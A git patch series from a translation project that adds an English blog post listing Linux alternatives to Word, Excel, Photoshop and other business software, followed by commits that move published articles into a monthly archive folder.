=?UTF-8?q?=E9=80=89=E9=A2=98:=20Excellent=20Bus?= =?UTF-8?q?iness=20Software=20Alternatives=20For=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...usiness Software Alternatives For Linux.md | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 sources/tech/20171130 Excellent Business Software Alternatives For Linux.md diff --git a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md new file mode 100644 index 0000000000..2ef0571fdb --- /dev/null +++ b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md @@ -0,0 +1,115 @@ +Excellent Business Software Alternatives For Linux +------- + +Many business owners choose to use Linux as the operating system for their operations for a variety of reasons. + +1. Firstly, they don't have to pay anything for the privilege, and that is a massive bonus during the early stages of a company where money is tight. + +2. Secondly, Linux is a light alternative compared to Windows and other popular operating systems available today. + +Of course, lots of entrepreneurs worry they won't have access to some of the essential software packages if they make that move. However, as you will discover throughout this post, there are plenty of similar tools that will cover all the bases. + + [![](https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s400/4444061098_6eeaa7dc1a_z.jpg)][3] + +### Alternatives to Microsoft Word + +All company bosses will require access to a word processing tool if they want to ensure the smooth running of their operation according to + +[the latest article from Fareed Siddiqui][4] + +. You'll need that software to write business plans, letters, and many other jobs within your firm. Thankfully, there are a variety of alternatives you might like to select if you opt for the Linux operating system. Some of the most popular ones include: + +* LibreOffice Writer + +* AbiWord + +* KWord + +* LaTeX + +So, you just need to read some online reviews and then download the best word processor based on your findings. Of course, if you're not satisfied with the solution, you should take a look at some of the other ones on that list. In many instances, any of the programs mentioned above should work well. + +### Alternatives to Microsoft Excel + + [![](https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s400/28929069495_e85d2626ba_z.jpg)][5] + +You need a spreadsheet tool if you want to ensure your business doesn't get into trouble when it comes to bookkeeping and inventory control. There are specialist software packages on the market for both of those tasks, but + +[open-source alternatives][6] + +to Microsoft Excel will give you the most amount of freedom when creating your spreadsheets and editing them. While there are other packages out there, some of the best ones for Linux users include: + +* [LibreOffice Calc][1] + +* KSpread + +* Gnumeric + +Those programs work in much the same way as Microsoft Excel, and so you can use them for issues like accounting and stock control. You might also use that software to monitor employee earnings or punctuality. The possibilities are endless and only limited by your imagination. + +### Alternatives to Adobe Photoshop + + [![](https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s400/32206185926_c69accfcef_z.jpg)][7] + +Company bosses require access to design programs when developing their marketing materials and creating graphics for their websites. You might also use software of that nature to come up with a new business logo at some point. Lots of entrepreneurs spend a fortune on + +[Training Connections Photoshop classes][8] + +and those available from other providers. They do that in the hope of educating their teams and getting the best results. However, people who use Linux can still benefit from that expertise if they select one of the following + +[alternatives][9] + +: + +* GIMP + +* Krita + +* Pixel + +* LightZone + +The last two suggestions on that list require a substantial investment. Still, they function in much the same way as Adobe Photoshop, and so you should manage to achieve the same quality of work. + +### Other software solutions that you'll want to consider + +Alongside those alternatives to some of the most widely-used software packages around today, business owners should take a look at the full range of products they could use with the Linux operating system. Here are some tools you might like to research and consider: + +* Inkscape - similar to Coreldraw + +* LibreOffice Base - similar to Microsoft Access + +* LibreOffice Impress - similar to Microsoft PowerPoint + +* File Roller - siThis is a contributed postmilar to WinZip + +* Linphone - similar to Skype + +There are + +[lots of other programs][10] + + you'll also want to research, and so the best solution is to use the internet to learn more. You will find lots of reviews from people who've used the software in the past, and many of them will compare the tool to its Windows or iOS alternative. So, you shouldn't have to work too hard to identify the best ones and sort the wheat from the chaff. + +Now you have all the right information; it's time to weigh all the pros and cons of Linux and work out if it's suitable for your operation. In most instances, that operating system does not place any limits on your business activities. It's just that you need to use different software compared to some of your competitors. People who use Linux tend to benefit from improved security, speed, and performance. Also, the solution gets regular updates, and so it's growing every single day. Unlike Windows and other solutions; you can customize Linux to meet your requirements. With that in mind, do not make the mistake of overlooking this fantastic system! + +-------------------------------------------------------------------------------- + +via: linuxblog.darkduck.com/2017/11/excellent-business-software.html + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:linuxblog.darkduck.com/2017/11/excellent-business-software.html +[1]:http://linuxblog.darkduck.com/2015/08/pivot-tables-in-libreoffice-calc.html +[3]:https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s1600/4444061098_6eeaa7dc1a_z.jpg +[4]:https://www.linkedin.com/pulse/benefits-using-microsoft-word-fareed/ +[5]:https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s1600/28929069495_e85d2626ba_z.jpg +[6]:http://linuxblog.darkduck.com/2014/03/why-open-software-and-what-are-benefits.html +[7]:https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s1600/32206185926_c69accfcef_z.jpg +[8]:https://www.trainingconnection.com/photoshop-training.php +[9]:http://linuxblog.darkduck.com/2011/10/photoshop-alternatives-for-linux.html +[10]:http://www.makeuseof.com/tag/best-linux-software/ From c1f508ce7e4e5851f9e0b8ac14981a2671bfee01 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 10:53:40 +0800 Subject: [PATCH 0141/1627] =?UTF-8?q?=E5=BD=92=E6=A1=A3=20201711?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- published/{ => 201711}/20141028 When Does Your OS Run.md | 0 ...170202 Understanding Firewalld in Multi-Zone Configurations.md | 0 published/{ => 201711}/20170227 Ubuntu Core in LXD containers.md | 0 ...E PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md | 0 ...ainer Host vs Container OS for Linux and Windows Containers.md | 0 .../20170608 The Life-Changing Magic of Tidying Up Code.md | 0 .../20170706 Wildcard Certificates Coming January 2018.md | 0 ... to Linux App Is a Handy Tool for Every Level of Linux User.md | 0 .../20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md | 0 .../{ => 201711}/20170928 3 Python web scrapers and crawlers.md | 0 published/{ => 201711}/20171002 Scaling the GitLab database.md | 0 .../20171003 PostgreSQL Hash Indexes Are Now Cool.md | 0 .../20171004 No the Linux desktop hasnt jumped in popularity.md | 0 .../20171007 Instant 100 command line productivity boost.md | 0 published/{ => 201711}/20171008 8 best languages to blog about.md | 0 ...aolin Teaching the Next Generation of Cybersecurity Experts.md | 0 ...Started Analyzing Twitter Data in Apache Kafka through KSQL.md | 0 ...0171011 How to set up a Postgres database on a Raspberry Pi.md | 0 published/{ => 201711}/20171011 Why Linux Works.md | 0 .../20171013 6 reasons open source is good for business.md | 0 .../{ => 201711}/20171013 Best of PostgreSQL 10 for the DBA.md | 0 ...015 How to implement cloud-native computing with Kubernetes.md | 0 .../20171015 Monitoring Slow SQL Queries via Slack.md | 0 .../20171015 Why Use Docker with R A DevOps Perspective.md | 0 published/{ => 201711}/20171016 Introducing CRI-O 1.0.md | 0 published/{ => 201711}/20171017 A tour of Postgres Index Types.md | 0 published/{ => 201711}/20171017 Image Processing on Linux.md | 0 .../20171018 How containers and microservices change security.md | 0 ...arn how to program in Python by building a simple dice game.md | 0 .../20171018 Tips to Secure Your Network in the Wake of KRACK.md | 0 .../20171019 3 Simple Excellent Linux Network Monitors.md | 0 ...019 How to manage Docker containers in Kubernetes with Java.md | 0 .../20171020 3 Tools to Help You Remember Linux Commands.md | 0 .../20171020 Running Android on Top of a Linux Graphics Stack.md | 0 .../{ => 201711}/20171024 Top 5 Linux pain points in 2017.md | 0 ...pen source in 2017 Let s analyze GitHub’s data and find out.md | 0 ...171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md | 0 ...p solution with BorgBackup, Rclone and Wasabi cloud storage.md | 0 .../{ => 201711}/20171026 But I dont know what a container is .md | 0 published/{ => 201711}/20171026 Why is Kubernetes so popular.md | 0 published/{ => 201711}/20171101 How to use cron in Linux.md | 0 ...1101 We re switching to a DCO for source code contributions.md | 0 ...171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md | 0 published/{ => 201711}/20171106 Finding Files with mlocate.md | 0 ...06 Linux Foundation Publishes Enterprise Open Source Guides.md | 0 ...uy an open source community clue. Here s how to do it right.md | 0 .../20171107 AWS adopts home-brewed KVM as new hypervisor.md | 0 .../20171107 How I created my first RPM package in Fedora.md | 0 ...20171108 Build and test applications with Ansible Container.md | 0 .../{ => 201711}/20171110 File better bugs with coredumpctl.md | 0 .../20171114 ​Linux totally dominates supercomputers.md | 0 .../{ => 201711}/20171116 5 Coolest Linux Terminal Emulators.md | 0 .../20171117 How to Easily Remember Linux Commands.md | 0 .../20171118 Getting started with OpenFaaS on minikube.md | 0 ... Instantly Share Your Terminal Session To Anyone In Seconds.md | 0 55 files changed, 0 insertions(+), 0 deletions(-) rename published/{ => 201711}/20141028 When Does Your OS Run.md (100%) rename published/{ => 201711}/20170202 Understanding Firewalld in Multi-Zone Configurations.md (100%) rename published/{ => 201711}/20170227 Ubuntu Core in LXD containers.md (100%) rename published/{ => 201711}/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md (100%) rename published/{ => 201711}/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md (100%) rename published/{ => 201711}/20170608 The Life-Changing Magic of Tidying Up Code.md (100%) rename published/{ => 201711}/20170706 Wildcard Certificates Coming January 2018.md (100%) rename published/{ => 201711}/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md (100%) rename published/{ => 201711}/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md (100%) rename published/{ => 201711}/20170928 3 Python web scrapers and crawlers.md (100%) rename published/{ => 201711}/20171002 Scaling the GitLab database.md (100%) rename published/{ => 201711}/20171003 PostgreSQL Hash Indexes Are Now Cool.md (100%) rename published/{ => 201711}/20171004 No the Linux desktop hasnt jumped in popularity.md (100%) rename published/{ => 201711}/20171007 Instant 100 command line productivity boost.md (100%) rename published/{ => 201711}/20171008 8 best languages to blog about.md (100%) rename published/{ => 201711}/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md (100%) rename published/{ => 201711}/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md (100%) rename published/{ => 201711}/20171011 How to set up a Postgres database on a Raspberry Pi.md (100%) rename published/{ => 201711}/20171011 Why Linux Works.md (100%) rename published/{ => 201711}/20171013 6 reasons open source is good for business.md (100%) rename published/{ => 201711}/20171013 Best of PostgreSQL 10 for the DBA.md (100%) rename published/{ => 201711}/20171015 How to implement cloud-native computing with Kubernetes.md (100%) rename published/{ => 201711}/20171015 Monitoring Slow SQL Queries via Slack.md (100%) rename published/{ => 201711}/20171015 Why Use Docker with R A DevOps Perspective.md (100%) rename published/{ => 201711}/20171016 Introducing CRI-O 1.0.md (100%) rename published/{ => 201711}/20171017 A tour of Postgres Index Types.md (100%) rename published/{ => 201711}/20171017 Image Processing on Linux.md (100%) rename published/{ => 201711}/20171018 How containers and microservices change security.md (100%) rename published/{ => 201711}/20171018 Learn how to program in Python by building a simple dice game.md (100%) rename published/{ => 201711}/20171018 Tips to Secure Your Network in the Wake of KRACK.md (100%) rename published/{ => 201711}/20171019 3 Simple Excellent Linux Network Monitors.md (100%) rename published/{ => 201711}/20171019 How to manage Docker containers in Kubernetes with Java.md (100%) rename published/{ => 201711}/20171020 3 Tools to Help You Remember Linux Commands.md (100%) rename published/{ => 201711}/20171020 Running Android on Top of a Linux Graphics Stack.md (100%) rename published/{ => 201711}/20171024 Top 5 Linux pain points in 2017.md (100%) rename published/{ => 201711}/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md (100%) rename published/{ => 201711}/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md (100%) rename published/{ => 201711}/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md (100%) rename published/{ => 201711}/20171026 But I dont know what a container is .md (100%) rename published/{ => 201711}/20171026 Why is Kubernetes so popular.md (100%) rename published/{ => 201711}/20171101 How to use cron in Linux.md (100%) rename published/{ => 201711}/20171101 We re switching to a DCO for source code contributions.md (100%) rename published/{ => 201711}/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md (100%) rename published/{ => 201711}/20171106 Finding Files with mlocate.md (100%) rename published/{ => 201711}/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md (100%) rename published/{ => 201711}/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md (100%) rename published/{ => 201711}/20171107 AWS adopts home-brewed KVM as new hypervisor.md (100%) rename published/{ => 201711}/20171107 How I created my first RPM package in Fedora.md (100%) rename published/{ => 201711}/20171108 Build and test applications with Ansible Container.md (100%) rename published/{ => 201711}/20171110 File better bugs with coredumpctl.md (100%) rename published/{ => 201711}/20171114 ​Linux totally dominates supercomputers.md (100%) rename published/{ => 201711}/20171116 5 Coolest Linux Terminal Emulators.md (100%) rename published/{ => 201711}/20171117 How to Easily Remember Linux Commands.md (100%) rename published/{ => 201711}/20171118 Getting started with OpenFaaS on minikube.md (100%) rename published/{ => 201711}/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md (100%) diff --git a/published/20141028 When Does Your OS Run.md b/published/201711/20141028 When Does Your OS Run.md similarity index 100% rename from published/20141028 When Does Your OS Run.md rename to published/201711/20141028 When Does Your OS Run.md diff --git a/published/20170202 Understanding Firewalld in Multi-Zone Configurations.md b/published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md similarity index 100% rename from published/20170202 Understanding Firewalld in Multi-Zone Configurations.md rename to published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md diff --git a/published/20170227 Ubuntu Core in LXD containers.md b/published/201711/20170227 Ubuntu Core in LXD containers.md similarity index 100% rename from published/20170227 Ubuntu Core in LXD containers.md rename to published/201711/20170227 Ubuntu Core in LXD containers.md diff --git a/published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md b/published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md similarity index 100% rename from published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md rename to published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md diff --git a/published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md similarity index 100% rename from published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md rename to published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md diff --git a/published/20170608 The Life-Changing Magic of Tidying Up Code.md b/published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md similarity index 100% rename from published/20170608 The Life-Changing Magic of Tidying Up Code.md rename to published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md diff --git a/published/20170706 Wildcard Certificates Coming January 2018.md b/published/201711/20170706 Wildcard Certificates Coming January 2018.md similarity index 100% rename from published/20170706 Wildcard Certificates Coming January 2018.md rename to published/201711/20170706 Wildcard Certificates Coming January 2018.md diff --git a/published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md b/published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md similarity index 100% rename from published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md rename to published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md diff --git a/published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md b/published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md similarity index 100% rename from published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md rename to published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md diff --git a/published/20170928 3 Python web scrapers and crawlers.md b/published/201711/20170928 3 Python web scrapers and crawlers.md similarity index 100% rename from published/20170928 3 Python web scrapers and crawlers.md rename to published/201711/20170928 3 Python web scrapers and crawlers.md diff --git a/published/20171002 Scaling the GitLab database.md b/published/201711/20171002 Scaling the GitLab database.md similarity index 100% rename from published/20171002 Scaling the GitLab database.md rename to published/201711/20171002 Scaling the GitLab database.md diff --git a/published/20171003 PostgreSQL Hash Indexes Are Now Cool.md b/published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md similarity index 100% rename from published/20171003 PostgreSQL Hash Indexes Are Now Cool.md rename to published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md diff --git a/published/20171004 No the Linux desktop hasnt jumped in popularity.md b/published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md similarity index 100% rename from published/20171004 No the Linux desktop hasnt jumped in popularity.md rename to published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md diff --git a/published/20171007 Instant 100 command line productivity boost.md b/published/201711/20171007 Instant 100 command line productivity boost.md similarity index 100% rename from published/20171007 Instant 100 command line productivity boost.md rename to published/201711/20171007 Instant 100 command line productivity boost.md diff --git a/published/20171008 8 best languages to blog about.md b/published/201711/20171008 8 best languages to blog about.md similarity index 100% rename from published/20171008 8 best languages to blog about.md rename to published/201711/20171008 8 best languages to blog about.md diff --git a/published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md b/published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md similarity index 100% rename from published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md rename to published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md diff --git a/published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md b/published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md similarity index 100% rename from published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md rename to published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md diff --git a/published/20171011 How to set up a Postgres database on a Raspberry Pi.md b/published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md similarity index 100% rename from published/20171011 How to set up a Postgres database on a Raspberry Pi.md rename to published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md diff --git a/published/20171011 Why Linux Works.md b/published/201711/20171011 Why Linux Works.md similarity index 100% rename from published/20171011 Why Linux Works.md rename to published/201711/20171011 Why Linux Works.md diff --git a/published/20171013 6 reasons open source is good for business.md b/published/201711/20171013 6 reasons open source is good for business.md similarity index 100% rename from published/20171013 6 reasons open source is good for business.md rename to published/201711/20171013 6 reasons open source is good for business.md diff --git a/published/20171013 Best of PostgreSQL 10 for the DBA.md b/published/201711/20171013 Best of PostgreSQL 10 for the DBA.md similarity index 100% rename from published/20171013 Best of PostgreSQL 10 for the DBA.md rename to published/201711/20171013 Best of PostgreSQL 10 for the DBA.md diff --git a/published/20171015 How to implement cloud-native computing with Kubernetes.md b/published/201711/20171015 How to implement cloud-native computing with Kubernetes.md similarity index 100% rename from published/20171015 How to implement cloud-native computing with Kubernetes.md rename to published/201711/20171015 How to implement cloud-native computing with Kubernetes.md diff --git a/published/20171015 Monitoring Slow SQL Queries via Slack.md b/published/201711/20171015 Monitoring Slow SQL Queries via Slack.md similarity index 100% rename from published/20171015 Monitoring Slow SQL Queries via Slack.md rename to published/201711/20171015 Monitoring Slow SQL Queries via Slack.md diff --git a/published/20171015 Why Use Docker with R A DevOps Perspective.md b/published/201711/20171015 Why Use Docker with R A DevOps Perspective.md similarity index 100% rename from published/20171015 Why Use Docker with R A DevOps Perspective.md rename to published/201711/20171015 Why Use Docker with R A DevOps Perspective.md diff --git a/published/20171016 Introducing CRI-O 1.0.md b/published/201711/20171016 Introducing CRI-O 1.0.md similarity index 100% rename from published/20171016 Introducing CRI-O 1.0.md rename to published/201711/20171016 Introducing CRI-O 1.0.md diff --git a/published/20171017 A tour of Postgres Index Types.md b/published/201711/20171017 A tour of Postgres Index Types.md similarity index 100% rename from published/20171017 A tour of Postgres Index Types.md rename to published/201711/20171017 A tour of Postgres Index Types.md diff --git a/published/20171017 Image Processing on Linux.md b/published/201711/20171017 Image Processing on Linux.md similarity index 100% rename from published/20171017 Image Processing on Linux.md rename to published/201711/20171017 Image Processing on Linux.md diff --git a/published/20171018 How containers and microservices change security.md b/published/201711/20171018 How containers and microservices change security.md similarity index 100% rename from published/20171018 How containers and microservices change security.md rename to published/201711/20171018 How containers and microservices change security.md diff --git a/published/20171018 Learn how to program in Python by building a simple dice game.md b/published/201711/20171018 Learn how to program in Python by building a simple dice game.md similarity index 100% rename from published/20171018 Learn how to program in Python by building a simple dice game.md rename to published/201711/20171018 Learn how to program in Python by building a simple dice game.md diff --git a/published/20171018 Tips to Secure Your Network in the Wake of KRACK.md b/published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md similarity index 100% rename from published/20171018 Tips to Secure Your Network in the Wake of KRACK.md rename to published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md diff --git a/published/20171019 3 Simple Excellent Linux Network Monitors.md b/published/201711/20171019 3 Simple Excellent Linux Network Monitors.md similarity index 100% rename from published/20171019 3 Simple Excellent Linux Network Monitors.md rename to published/201711/20171019 3 Simple Excellent Linux Network Monitors.md diff --git a/published/20171019 How to manage Docker containers in Kubernetes with Java.md b/published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md similarity index 100% rename from published/20171019 How to manage Docker containers in Kubernetes with Java.md rename to published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md diff --git a/published/20171020 3 Tools to Help You Remember Linux Commands.md b/published/201711/20171020 3 Tools to Help You Remember Linux Commands.md similarity index 100% rename from published/20171020 3 Tools to Help You Remember Linux Commands.md rename to published/201711/20171020 3 Tools to Help You Remember Linux Commands.md diff --git a/published/20171020 Running Android on Top of a Linux Graphics Stack.md b/published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md similarity index 100% rename from published/20171020 Running Android on Top of a Linux Graphics Stack.md rename to published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md diff --git a/published/20171024 Top 5 Linux pain points in 2017.md b/published/201711/20171024 Top 5 Linux pain points in 2017.md similarity index 100% rename from published/20171024 Top 5 Linux pain points in 2017.md rename to published/201711/20171024 Top 5 Linux pain points in 2017.md diff --git a/published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md b/published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md similarity index 100% rename from published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md rename to published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md diff --git a/published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md b/published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md similarity index 100% rename from published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md rename to published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md diff --git a/published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md b/published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md similarity index 100% rename from published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md rename to published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md diff --git a/published/20171026 But I dont know what a container is .md b/published/201711/20171026 But I dont know what a container is .md similarity index 100% rename from published/20171026 But I dont know what a container is .md rename to published/201711/20171026 But I dont know what a container is .md diff --git a/published/20171026 Why is Kubernetes so popular.md b/published/201711/20171026 Why is Kubernetes so popular.md similarity index 100% rename from published/20171026 Why is Kubernetes so popular.md rename to published/201711/20171026 Why is Kubernetes so popular.md diff --git a/published/20171101 How to use cron in Linux.md b/published/201711/20171101 How to use cron in Linux.md similarity index 100% rename from published/20171101 How to use cron in Linux.md rename to published/201711/20171101 How to use cron in Linux.md diff --git a/published/20171101 We re switching to a DCO for source code contributions.md b/published/201711/20171101 We re switching to a DCO for source code contributions.md similarity index 100% rename from published/20171101 We re switching to a DCO for source code contributions.md rename to published/201711/20171101 We re switching to a DCO for source code contributions.md diff --git a/published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md b/published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md similarity index 100% rename from published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md rename to published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md diff --git a/published/20171106 Finding Files with mlocate.md b/published/201711/20171106 Finding Files with mlocate.md similarity index 100% rename from published/20171106 Finding Files with mlocate.md rename to published/201711/20171106 Finding Files with mlocate.md diff --git a/published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md b/published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md similarity index 100% rename from published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md rename to published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md diff --git a/published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md b/published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md similarity index 100% rename from published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md rename to published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md diff --git a/published/20171107 AWS adopts home-brewed KVM as new hypervisor.md b/published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md similarity index 100% rename from published/20171107 AWS adopts home-brewed KVM as new hypervisor.md rename to published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md diff --git a/published/20171107 How I created my first RPM package in Fedora.md b/published/201711/20171107 How I created my first RPM package in Fedora.md similarity index 100% rename from published/20171107 How I created my first RPM package in Fedora.md rename to published/201711/20171107 How I created my first RPM package in Fedora.md diff --git a/published/20171108 Build and test applications with Ansible Container.md b/published/201711/20171108 Build and test applications with Ansible Container.md similarity index 100% rename from published/20171108 Build and test applications with Ansible Container.md rename to published/201711/20171108 Build and test applications with Ansible Container.md diff --git a/published/20171110 File better bugs with coredumpctl.md b/published/201711/20171110 File better bugs with coredumpctl.md similarity index 100% rename from published/20171110 File better bugs with coredumpctl.md rename to published/201711/20171110 File better bugs with coredumpctl.md diff --git a/published/20171114 ​Linux totally dominates supercomputers.md b/published/201711/20171114 ​Linux totally dominates supercomputers.md similarity index 100% rename from published/20171114 ​Linux totally dominates supercomputers.md rename to published/201711/20171114 ​Linux totally dominates supercomputers.md diff --git a/published/20171116 5 Coolest Linux Terminal Emulators.md b/published/201711/20171116 5 Coolest Linux Terminal Emulators.md similarity index 100% rename from published/20171116 5 Coolest Linux Terminal Emulators.md rename to published/201711/20171116 5 Coolest Linux Terminal Emulators.md diff --git a/published/20171117 How to Easily Remember Linux Commands.md b/published/201711/20171117 How to Easily Remember Linux Commands.md similarity index 100% rename from published/20171117 How to Easily Remember Linux Commands.md rename to published/201711/20171117 How to Easily Remember Linux Commands.md diff --git a/published/20171118 Getting started with OpenFaaS on minikube.md b/published/201711/20171118 Getting started with OpenFaaS on minikube.md similarity index 100% rename from published/20171118 Getting started with OpenFaaS on minikube.md rename to published/201711/20171118 Getting started with OpenFaaS on minikube.md diff --git a/published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md similarity index 100% rename from published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md rename to published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md From 64f93dcc22974d307c9b8a97185b982af05ab2f7 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 10:55:20 +0800 Subject: [PATCH 0142/1627] PUB:20171124 How to Install Android File Transfer for Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wenwensnow 文章发布地址:https://linux.cn/article-9100-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/wenwensnow 加油! --- .../20171124 How to Install Android File Transfer for Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171124 How to Install Android File Transfer for Linux.md (100%) diff --git a/translated/tech/20171124 How to Install Android File Transfer for Linux.md b/published/20171124 How to Install Android File Transfer for Linux.md similarity index 100% rename from translated/tech/20171124 How to Install Android File Transfer for Linux.md rename to published/20171124 How to Install Android File Transfer for Linux.md From 28f670d4d53e81c989f6e643fca0cd4553929e32 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 